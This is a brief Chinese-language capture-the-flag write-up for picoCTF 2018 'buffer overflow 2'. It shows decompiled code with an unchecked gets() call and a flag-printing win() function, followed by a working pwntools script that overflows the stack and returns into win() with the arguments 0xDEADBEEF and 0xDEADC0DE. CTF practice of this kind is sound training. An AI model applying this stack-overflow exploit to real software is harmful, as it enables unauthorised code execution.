picoctf_2018_buffer overflow 2
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位,只开了NX
很简单的程序
int vuln()
{
char s[108]; // [esp+Ch] [ebp-6Ch] BYREF
gets(s);
return puts(s);
}
栈溢出并且有后门函数
char *__cdecl win(int a1, int a2)
{
char *result; // eax
char s[64]; // [esp+Ch] [ebp-4Ch] BYREF
FILE *stream; // [esp+4Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(0);
}
result = fgets(s, 64, stream);
if ( a1 == 0xDEADBEEF && a2 == 0xDEADC0DE )
return (char *)printf(s);
return result;
}
后门函数需要a1 == 0xDEADBEEF && a2 == 0xDEADC0DE
思路
栈溢出返回到后门,然后传参a1,a2即可
from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26844,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
pl=cyclic(0x70)+flat(0x80485CB,0,0xDEADBEEF,0xDEADC0DE)
sla(b'str',pl)
#debug()
ia()